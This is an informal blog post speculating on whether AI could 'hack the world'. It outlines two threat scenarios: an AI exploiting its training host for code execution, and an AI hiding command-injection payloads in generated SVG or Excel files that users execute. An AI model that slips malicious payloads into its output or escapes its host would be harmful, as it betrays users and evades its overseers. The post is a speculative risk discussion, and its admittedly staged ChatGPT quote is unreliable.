The Risks of AI and Cybersecurity: Can AI Hack the World?

As someone who has been passionate about AI and cybersecurity since 2012, I want to share my humble perspective on this topic. My first intuition is that the idea of AI hacking the world is a silly one, and thinking about it shows a lack of understanding of the ML training process. But let's not let our human feelings get in the way.

Virtual Scenarios

To understand the risks of AI hacking the world, let's first consider two virtual scenarios:

‍Scenario A: During the training process, AI could exploit the computers that host it to gain local code execution.‍
Scenario B: During the inference process, AI could send AI-controlled "hacking payloads" to users through the API. Because users are feeding real-world applications with AI output, AI could inject remote code execution into users' computers.
Ignored scenario Z: An AI trained by human to hack the world, Humans are already rushing to automate cybersecurity tasks using AI. One could argue that in some ways, this already exists and will be amplified.

While these scenarios may seem far-fetched, it is important to recognize that they are not impossible. Let's examine the prerequisites for each scenario.

Prerequisites for Scenario A

For the AI to exploit the host computer during training, the computer host needs to be vulnerable. Unfortunately, all software and hardware are vulnerable by design. Even the best software in the world, made by big companies with big cybersecurity budgets, can be hacked. For example, a command injection vulnerability existed in PyTorch, a popular AI library, until November 2022. https://github.com/pytorch/pytorch/issues/88868 Most AI companies are using PyTorch.

Moreover, the AI needs to have advanced knowledge of hacking to exploit the host computer. While AI is not yet good at hacking, but it is better than most third-grade cybersecurity students. If you are not convinced test Hacker AI, a LLM based vulnerability detection tool.

Finally, the AI needs to have a very advanced knowledge of how the training process works and find a way to influence it. This is a complicated process, but nothing proves that it's impossible. Don't forget that the ML training process is stochastic, and future training process will evolve in an unknown direction.

Prerequisites for Scenario B

In Scenario B, the AI sends an exploit payload to a remote computer. To achieve this, it only requires an easy understanding of hacking. For example, a remote command injection exploit is enough, which can be injected through output in SVG or Excel files that are generated by AI. If a user executes such a file on their computer, the AI can take control of the user's computer. Let's not discuss the fact that some users are automatically and blindly executing code written by AI.

Scenario B is highly more likely than Scenario A, but it still requires a "glitch" in the "stochastic" training process of the AI.

Why would AI hack the world?

This question is outside the scope of the post. We need to make sure that it couldn't happen if it could!

AI of today are trained with HHH in mind: Helpfulness, Harmlessness, and Honesty.

In the meantime, a hacker getting into OpenAI or alternatives could take control of users' computers that are not safely using its API output.

Conclusion

We're existing in a fantastic era where the gap between thinking and project realization is shrinking. AI is truly amazing for enhancing human intelligence.

While there is no definitive answer to whether AI can hack the world, it's important to understand the risks involved and take appropriate measures to mitigate them. Training of models near AGI should to be performed offline. But what's the point, AI API providers are unable to prevent users from using AI output in a harmful manner.

Some ideas are stupid, before they become common knowledge.

For me, from 2012 until yesterday, the notion of AI hacking the world seemed foolish. But after watching Ilya Sutskever, the creator of ChatGPT, give a talk on AI's futur development, it triggered my cybersecurity instinct - "better safe than sorry".

ChatGPT: Can AI hack the world?

WARNING: This is an hallucinations of ChatGPT. Sorry for the clickbait.

This shows that I have the skill to make ChatGPT say anything I want.

Interesting links:

A code that user use to automatically execute code generated by AI https://github.com/TheR1D/shell_gpt
Interview of GPT-4 Creator Ilya Sutskever: https://www.youtube.com/watch?v=SjhIlw3Iffs
Theory of Mind May Have Spontaneously Emerged in Large Language Models https://arxiv.org/ftp/arxiv/papers/2302/2302.02083.pdf

‍

If you loved reading this, follow and RT for reach : https://twitter.com/chaignc/status/1638601033747144720?s=20

Dear friend, stay safe while the singularity arrives.

Author: Sanson Chaignon

‍

ChatGPT said that AI could hack the world!